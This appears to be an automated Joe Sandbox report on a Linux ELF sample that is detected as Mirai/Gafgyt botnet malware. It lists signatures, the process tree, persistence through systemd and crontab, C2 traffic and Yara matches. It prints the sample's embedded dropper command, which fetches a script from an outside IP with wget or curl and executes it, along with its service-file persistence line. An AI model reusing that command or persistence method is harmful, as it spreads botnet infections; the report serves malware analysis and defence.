Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
i586.elf

Overview

General Information

Sample name:i586.elf
Analysis ID:1585003
MD5:2d0bd765ed70648d44343839f6927c45
SHA1:9348135e9d1e451b6b0b45b1017c5c6e29900a43
SHA256:cbf5056d52a2ae8703611527edd723b72dcfa0ea3c7576c09f728f379d124220
Tags:elfuser-abuse_ch
Infos:

Detection

Score:76
Range:0 - 100
Whitelisted:false

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Deletes system log files
Machine Learning detection for sample
Manipulation of devices in /dev
Sample deletes itself
Sample tries to kill multiple processes (SIGKILL)
Creates hidden files and/or directories
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Executes the "rm" command used to delete files or directories
Executes the "systemctl" command used for controlling the systemd system and service manager
Found strings indicative of a multi-platform dropper
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample tries to kill a process (SIGKILL)
Uses the "uname" system call to query kernel version information (possible evasion)
Yara signature match

Classification

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1585003
Start date and time:2025-01-07 00:30:33 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 5m 20s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:i586.elf
Detection:MAL
Classification:mal76.spre.evad.linELF@0/3@54/0
  • VT rate limit hit for: i586.elf
Command:/tmp/i586.elf
PID:6267
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
made you my bitch
Standard Error:
  • system is lnxubuntu20
  • i586.elf (PID: 6267, Parent: 6193, MD5: 2d0bd765ed70648d44343839f6927c45) Arguments: /tmp/i586.elf
    • i586.elf New Fork (PID: 6268, Parent: 6267)
      • i586.elf New Fork (PID: 6269, Parent: 6268)
        • i586.elf New Fork (PID: 6447, Parent: 6269)
        • i586.elf New Fork (PID: 6448, Parent: 6269)
        • i586.elf New Fork (PID: 6449, Parent: 6269)
        • i586.elf New Fork (PID: 6450, Parent: 6269)
        • i586.elf New Fork (PID: 6455, Parent: 6269)
        • i586.elf New Fork (PID: 6456, Parent: 6269)
        • i586.elf New Fork (PID: 6457, Parent: 6269)
        • i586.elf New Fork (PID: 6461, Parent: 6269)
        • i586.elf New Fork (PID: 6462, Parent: 6269)
        • i586.elf New Fork (PID: 6489, Parent: 6269)
        • i586.elf New Fork (PID: 6494, Parent: 6269)
        • i586.elf New Fork (PID: 6495, Parent: 6269)
        • i586.elf New Fork (PID: 6498, Parent: 6269)
        • i586.elf New Fork (PID: 6500, Parent: 6269)
        • i586.elf New Fork (PID: 6528, Parent: 6269)
        • i586.elf New Fork (PID: 6529, Parent: 6269)
        • i586.elf New Fork (PID: 6533, Parent: 6269)
        • i586.elf New Fork (PID: 6537, Parent: 6269)
        • i586.elf New Fork (PID: 6538, Parent: 6269)
        • i586.elf New Fork (PID: 6545, Parent: 6269)
        • i586.elf New Fork (PID: 6546, Parent: 6269)
        • i586.elf New Fork (PID: 6553, Parent: 6269)
        • i586.elf New Fork (PID: 6554, Parent: 6269)
        • i586.elf New Fork (PID: 6559, Parent: 6269)
        • i586.elf New Fork (PID: 6560, Parent: 6269)
        • i586.elf New Fork (PID: 6563, Parent: 6269)
        • i586.elf New Fork (PID: 6565, Parent: 6269)
        • i586.elf New Fork (PID: 6570, Parent: 6269)
        • i586.elf New Fork (PID: 6572, Parent: 6269)
        • i586.elf New Fork (PID: 6573, Parent: 6269)
        • i586.elf New Fork (PID: 6576, Parent: 6269)
        • i586.elf New Fork (PID: 6578, Parent: 6269)
        • i586.elf New Fork (PID: 6580, Parent: 6269)
        • i586.elf New Fork (PID: 6586, Parent: 6269)
        • i586.elf New Fork (PID: 6587, Parent: 6269)
        • i586.elf New Fork (PID: 6592, Parent: 6269)
        • i586.elf New Fork (PID: 6593, Parent: 6269)
        • i586.elf New Fork (PID: 6598, Parent: 6269)
        • i586.elf New Fork (PID: 6600, Parent: 6269)
        • i586.elf New Fork (PID: 6604, Parent: 6269)
        • i586.elf New Fork (PID: 6606, Parent: 6269)
        • i586.elf New Fork (PID: 6610, Parent: 6269)
        • i586.elf New Fork (PID: 6611, Parent: 6269)
      • i586.elf New Fork (PID: 6270, Parent: 6268)
        • i586.elf New Fork (PID: 6272, Parent: 6270)
      • i586.elf New Fork (PID: 6271, Parent: 6268)
      • sh (PID: 6271, Parent: 6268, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl daemon-reload"
        • sh New Fork (PID: 6273, Parent: 6271)
        • systemctl (PID: 6273, Parent: 6271, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl daemon-reload
      • i586.elf New Fork (PID: 6288, Parent: 6268)
      • sh (PID: 6288, Parent: 6268, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl enable startup_command.service"
        • sh New Fork (PID: 6289, Parent: 6288)
        • systemctl (PID: 6289, Parent: 6288, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl enable startup_command.service
  • systemd New Fork (PID: 6275, Parent: 6274)
  • snapd-env-generator (PID: 6275, Parent: 6274, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator
  • systemd New Fork (PID: 6293, Parent: 6292)
  • snapd-env-generator (PID: 6293, Parent: 6292, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator
  • sh (PID: 6305, Parent: 1477, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-rfkill
  • gsd-rfkill (PID: 6305, Parent: 1477, MD5: 88a16a3c0aba1759358c06215ecfb5cc) Arguments: /usr/libexec/gsd-rfkill
  • dash New Fork (PID: 6310, Parent: 4338)
  • rm (PID: 6310, Parent: 4338, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.n7e6qDIlaD /tmp/tmp.jHVnaNFY0j /tmp/tmp.dhaROQ2zZB
  • dash New Fork (PID: 6311, Parent: 4338)
  • rm (PID: 6311, Parent: 4338, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.n7e6qDIlaD /tmp/tmp.jHVnaNFY0j /tmp/tmp.dhaROQ2zZB
  • systemd New Fork (PID: 6312, Parent: 1)
  • systemd-hostnamed (PID: 6312, Parent: 1, MD5: 2cc8a5576629a2d5bd98e49a4b8bef65) Arguments: /lib/systemd/systemd-hostnamed
  • gdm3 New Fork (PID: 6443, Parent: 1320)
  • Default (PID: 6443, Parent: 1320, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • gdm3 New Fork (PID: 6444, Parent: 1320)
  • Default (PID: 6444, Parent: 1320, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • cleanup
SourceRuleDescriptionAuthorStrings
i586.elfLinux_Trojan_Gafgyt_5bf62ce4unknownunknown
  • 0xc3a5:$a: 89 E5 56 53 31 F6 8D 45 10 83 EC 10 89 45 F4 8B 55 F4 46 8D
i586.elfLinux_Trojan_Mirai_b14f4c5dunknownunknown
  • 0x5340:$a: 53 31 DB 8B 4C 24 0C 8B 54 24 08 83 F9 01 76 15 66 8B 02 83 E9 02 25 FF FF 00 00 83 C2 02 01 C3 83 F9 01 77 EB 49 75 05 0F BE 02 01 C3
i586.elfLinux_Trojan_Mirai_5f7b67b8unknownunknown
  • 0xd038:$a: 89 38 83 CF FF 89 F8 5A 59 5F C3 57 56 83 EC 04 8B 7C 24 10 8B 4C
i586.elfLinux_Trojan_Mirai_88de437funknownunknown
  • 0x83e2:$a: 24 08 8B 4C 24 04 85 D2 74 0D 31 C0 89 F6 C6 04 08 00 40 39 D0
i586.elfLinux_Trojan_Mirai_389ee3e9unknownunknown
  • 0xc091:$a: 89 45 00 EB 2C 8B 4B 04 8B 13 8B 7B 18 8B 01 01 02 8B 02 83
Click to see the 2 entries
SourceRuleDescriptionAuthorStrings
6455.1.0000000008048000.0000000008059000.r-x.sdmpLinux_Trojan_Gafgyt_5bf62ce4unknownunknown
  • 0xc3a5:$a: 89 E5 56 53 31 F6 8D 45 10 83 EC 10 89 45 F4 8B 55 F4 46 8D
6455.1.0000000008048000.0000000008059000.r-x.sdmpLinux_Trojan_Mirai_b14f4c5dunknownunknown
  • 0x5340:$a: 53 31 DB 8B 4C 24 0C 8B 54 24 08 83 F9 01 76 15 66 8B 02 83 E9 02 25 FF FF 00 00 83 C2 02 01 C3 83 F9 01 77 EB 49 75 05 0F BE 02 01 C3
6455.1.0000000008048000.0000000008059000.r-x.sdmpLinux_Trojan_Mirai_5f7b67b8unknownunknown
  • 0xd038:$a: 89 38 83 CF FF 89 F8 5A 59 5F C3 57 56 83 EC 04 8B 7C 24 10 8B 4C
6455.1.0000000008048000.0000000008059000.r-x.sdmpLinux_Trojan_Mirai_88de437funknownunknown
  • 0x83e2:$a: 24 08 8B 4C 24 04 85 D2 74 0D 31 C0 89 F6 C6 04 08 00 40 39 D0
6455.1.0000000008048000.0000000008059000.r-x.sdmpLinux_Trojan_Mirai_389ee3e9unknownunknown
  • 0xc091:$a: 89 45 00 EB 2C 8B 4B 04 8B 13 8B 7B 18 8B 01 01 02 8B 02 83
Click to see the 303 entries
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: i586.elfReversingLabs: Detection: 55%
Source: i586.elfJoe Sandbox ML: detected
Source: i586.elfString: cd /tmp || cd /var/run || cd /mnt || cd /root || cd / || cd /home; wget http://154.216.20.138/auto.sh || busybox wget http://154.216.20.138/auto.sh || curl -O http://154.216.20.138/auto.sh; chmod 777 auto.sh; ./auto.sh %s
Source: i586.elfString: G%s/%s/proc//proc/%s/cmdlinewgetcurlnetstatgreppsbusyboxlsmvechokillkillallbashrebootshutdownhaltiptablespowerofffaggot got malware'd/tmp/opt/home/dev/var/sbin/proc/self/exe/mnt/root/dev/null/dev/consolewsystemctl daemon-reload/tmp/current_crontabcrontab %s/tmp/crontabXXXXXX@reboot %s
Source: i586.elfString: systemctl enable startup_command.servicecrontab -l > /tmp/current_crontab 2>/dev/nullcd /tmp || cd /var/run || cd /mnt || cd /root || cd / || cd /home; wget http://154.216.20.138/auto.sh || busybox wget http://154.216.20.138/auto.sh || curl -O http://154.216.20.138/auto.sh; chmod 777 auto.sh; ./auto.sh %s
Source: startup_command.service.13.drString: ExecStart=cd /tmp || cd /var/run || cd /mnt || cd /root || cd / || cd /home; wget http://154.216.20.138/auto.sh || busybox wget http://154.216.20.138/auto.sh || curl -O http://154.216.20.138/auto.sh; chmod 777 auto.sh; ./auto.sh (null)
Source: global trafficTCP traffic: 192.168.2.23:45860 -> 45.200.149.96:2601
Source: global trafficTCP traffic: 192.168.2.23:57110 -> 107.175.130.16:7722
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknownTCP traffic detected without corresponding DNS query: 34.249.145.219
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 34.249.145.219
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: global trafficDNS traffic detected: DNS query: tcpdown.su
Source: global trafficDNS traffic detected: DNS query: tcpdown.suaa
Source: global trafficDNS traffic detected: DNS query: tcpdown.su
Source: global trafficDNS traffic detected: DNS query: tcpdown.su
Source: startup_command.service.13.drString found in binary or memory: http://154.216.20.138/auto.sh
Source: i586.elf, startup_command.service.13.drString found in binary or memory: http://154.216.20.138/auto.sh;
Source: i586.elf, 6267.1.0000000008d16000.0000000008d18000.rw-.sdmp, i586.elf, 6267.1.00000000ff986000.00000000ff9a7000.rw-.sdmpString found in binary or memory: https://motd.ubuntu.com
Source: i586.elf, 6267.1.00000000ff986000.00000000ff9a7000.rw-.sdmpString found in binary or memory: https://motd.ubuntu.come
Source: i586.elf, 6267.1.0000000008d16000.0000000008d18000.rw-.sdmpString found in binary or memory: https://motd.ubuntu.comhe
Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39258
Source: unknownNetwork traffic detected: HTTP traffic on port 39258 -> 443

System Summary

barindex
Source: i586.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: i586.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: i586.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: i586.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: i586.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: i586.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: i586.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6455.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6455.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6455.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6455.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6455.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6455.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6455.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6570.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6570.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6570.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6570.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6570.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6570.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6570.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6495.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6495.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6495.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6495.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6495.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6495.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6495.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6457.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6457.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6457.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6457.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6457.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6457.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6457.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6267.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6267.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6267.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6267.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6267.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6267.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6267.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6580.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6580.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6580.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6580.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6580.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6580.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6580.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6560.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6560.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6560.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6560.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6560.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6560.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6560.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6572.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6572.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6572.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6572.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6572.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6572.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6572.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6587.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6587.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6587.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6587.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6587.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6587.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6587.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6494.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6494.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6494.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6494.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6494.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6494.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6494.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6586.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6586.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6586.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6586.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6586.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6586.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6586.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6461.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6461.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6461.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6461.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6461.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6461.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6461.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6449.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6449.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6449.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6449.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6449.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6449.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6449.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6604.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
